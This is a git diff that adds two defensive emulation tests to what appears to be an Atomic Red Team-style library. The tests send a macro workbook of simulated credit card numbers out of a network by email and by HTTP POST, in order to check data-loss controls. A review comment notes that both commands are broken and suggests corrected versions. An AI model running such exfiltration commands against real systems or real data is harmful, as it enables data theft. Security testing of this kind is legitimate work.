diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 4fefac9b..a8e72c30 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -377,6 +377,8 @@ defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
+defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
+defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 766fe117..e3a45879 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -262,6 +262,8 @@ defense-evasion,T1070.005,Network Share Connection Removal,3,Remove Network Shar
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
+defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
+defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 96704302..eaf5e1e5 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -661,6 +661,8 @@
- Atomic Test #2: Execute base64-encoded PowerShell [windows]
- Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
- Atomic Test #4: Execution from Compressed File [windows]
+ - Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
+ - Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
- [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 35f36bb9..6433b60d 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -479,6 +479,8 @@
- Atomic Test #2: Execute base64-encoded PowerShell [windows]
- Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
- Atomic Test #4: Execution from Compressed File [windows]
+ - Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
+ - Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
- [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 30abba87..eb828f52 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -28672,6 +28672,60 @@ defense-evasion:
rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul
del /Q "%temp%\T1027.zip" >nul 2>nul
name: command_prompt
+ - name: DLP Evasion via Sensitive Data in VBA Macro over email
+ auto_generated_guid: 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad
+ description: |
+ Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email.
+ Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
+ supported_platforms:
+ - windows
+ input_arguments:
+ input_file:
+ description: Path of the XLSM file
+ type: path
+ default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+ sender:
+ description: sender email
+ type: string
+ default: test@corp.com
+ receiver:
+ description: receiver email
+ type: string
+ default: test@corp.com
+ smtp_server:
+ description: SMTP Server IP Address
+ type: string
+ default: 127.0.0.1
+ dependency_executor_name: powershell
+ executor:
+ command: '"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027
+ Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+ -SmtpServer #{smtp_server}"
+
+'
+ name: powershell
+ - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP
+ auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319
+ description: |
+ Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP.
+ Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
+ supported_platforms:
+ - windows
+ input_arguments:
+ input_file:
+ description: Path of the XLSM file
+ type: path
+ default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+ ip_address:
+ description: Destination IP address
+ type: string
+ default: 127.0.0.1
+ dependency_executor_name: powershell
+ executor:
+ command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+
+'
+ name: powershell
T1218.008:
technique:
id: attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071
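Review bot: Neither new executor command performs the transfer its description promises, so a clean run says nothing about whether DLP controls would have caught the workbook. In the email test the whole `Send-MailMessage` line is wrapped in double quotes with a nested quoted subject, so PowerShell does not parse it as a cmdlet call, and in the HTTP test `-Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm` posts the path text rather than the file contents. Both commands also hard-code the workbook path and ignore the declared `input_file` argument, so overriding it has no effect. I would change them to `Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments "#{input_file}" -SmtpServer #{smtp_server}` and `Invoke-WebRequest -Uri #{ip_address} -Method POST -InFile "#{input_file}"`. This index looks generated, so the fix presumably belongs in the technique's source YAML; the same two commands are repeated in the T1027.md hunk.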
diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md
index 26242614..74a09cdb 100644
--- a/atomics/T1027/T1027.md
+++ b/atomics/T1027/T1027.md
@@ -18,6 +18,10 @@ Adversaries may also obfuscate commands executed from payloads or directly via a
- [Atomic Test #4 - Execution from Compressed File](#atomic-test-4---execution-from-compressed-file)
+- [Atomic Test #5 - DLP Evasion via Sensitive Data in VBA Macro over email](#atomic-test-5---dlp-evasion-via-sensitive-data-in-vba-macro-over-email)
+
+- [Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP](#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http)
+
@@ -174,4 +178,68 @@ Expand-Archive -path "$env:temp\T1027.zip" -DestinationPath "$env:temp\temp_T102
+
+
+
+## Atomic Test #5 - DLP Evasion via Sensitive Data in VBA Macro over email
+Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email.
+Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| input_file | Path of the XLSM file | path | PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm|
+| sender | sender email | string | test@corp.com|
+| receiver | receiver email | string | test@corp.com|
+| smtp_server | SMTP Server IP Address | string | 127.0.0.1|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}"
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP
+Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP.
+Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| input_file | Path of the XLSM file | path | PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm|
+| ip_address | Destination IP address | string | 127.0.0.1|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+```
+
+
+
+
+
+